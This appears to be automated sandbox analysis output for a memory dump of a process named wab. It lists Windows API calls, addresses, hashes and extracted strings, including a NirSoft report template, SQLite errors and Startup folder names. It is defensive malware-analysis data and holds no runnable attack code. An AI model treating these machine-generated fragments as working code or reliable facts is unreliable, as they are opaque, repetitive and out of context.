                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                    • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                                                                    • API String ID: 667068680-3953557276
                                                                                                                                                                                                                    • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                                                                    • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                                                                                                                    • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                                                                                                                    • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                                                                                                                    • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                                                                                                                      • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                                                                                                                      • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                                                                                                                      • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0041234D
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1700100422-0
                                                                                                                                                                                                                    • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                                                                                    • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                                                                                                                    • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                                                                                                                    • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                                                                                                                    • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                                                                                                                    • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 552707033-0
                                                                                                                                                                                                                    • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                                                                    • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                                                                                                                                                                      • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                                                                                                                      • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                                                      • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040C11B
                                                                                                                                                                                                                    • strchr.MSVCRT ref: 0040C140
                                                                                                                                                                                                                    • strchr.MSVCRT ref: 0040C151
                                                                                                                                                                                                                    • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040C17A
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                                                                                                                                                    • String ID: 4$h
                                                                                                                                                                                                                    • API String ID: 4066021378-1856150674
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$_snwprintf
                                                                                                                                                                                                                    • String ID: %%0.%df
                                                                                                                                                                                                                    • API String ID: 3473751417-763548558
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                                                                                                                    • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                                                                                                                    • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 00406136
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                                                                                                                    • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                                                                                                                    • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                                                                                                                    • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                                                                                                    • String ID: A
                                                                                                                                                                                                                    • API String ID: 2892645895-3554254475
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                                                                                                                                      • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                                                                                                                                      • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                                                                                                                                      • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                                                                                                                                      • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                                                                                                                                    • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                                                                                                                                    • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                                                                                                                                    • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040DA23
                                                                                                                                                                                                                    • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                                                                                                                                    • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                                                                                                                                    • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                                                                                                                                      • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                                                                                                                    • String ID: caption
                                                                                                                                                                                                                    • API String ID: 973020956-4135340389
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                                                                                                                                    • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                                                                                                                                    • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                                                                                                                                    • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$_snwprintf$wcscpy
                                                                                                                                                                                                                    • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                                                                    • API String ID: 1283228442-2366825230
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • wcschr.MSVCRT ref: 00413972
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                                                                      • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 004139D1
                                                                                                                                                                                                                    • wcscat.MSVCRT ref: 004139DC
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004139B8
                                                                                                                                                                                                                      • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                                                                                                                                      • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00413A00
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 00413A1B
                                                                                                                                                                                                                    • wcscat.MSVCRT ref: 00413A27
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                                                                                                                    • String ID: \systemroot
                                                                                                                                                                                                                    • API String ID: 4173585201-1821301763
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: wcscpy
                                                                                                                                                                                                                    • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                                                                                    • API String ID: 1284135714-318151290
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                                                                                                                    • String ID: 0$6
                                                                                                                                                                                                                    • API String ID: 4066108131-3849865405
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004082EF
                                                                                                                                                                                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00408362
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00408377
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$ByteCharMultiWide
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 290601579-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$memchrmemset
                                                                                                                                                                                                                    • String ID: PD$PD
                                                                                                                                                                                                                    • API String ID: 1581201632-2312785699
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 00409F6E
                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 00409FA5
                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2163313125-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@$wcslen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 239872665-3916222277
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                                                                                                    • String ID: %s (%s)$YV@
                                                                                                                                                                                                                    • API String ID: 3979103747-598926743
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                                                                    • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                                                                    • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                                                    • API String ID: 2780580303-317687271
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                                                                                                                                                    • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040A6B1
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                                                                                                    • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                                                                    • API String ID: 2767993716-572158859
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                                                                                                                                    • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                                                                                                                                      • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                                                                                                                    • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                                                                    • API String ID: 3176057301-2039793938
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                                                                                                                                    • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                                                                                                                                    • database %s is already in use, xrefs: 0042F6C5
                                                                                                                                                                                                                    • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                                                                                                                                    • out of memory, xrefs: 0042F865
                                                                                                                                                                                                                    • unable to open database: %s, xrefs: 0042F84E
                                                                                                                                                                                                                    • database is already attached, xrefs: 0042F721
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                                                    • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                                                                    • API String ID: 1297977491-2001300268
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040EB80
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040EB94
                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                                                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                                                                                                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
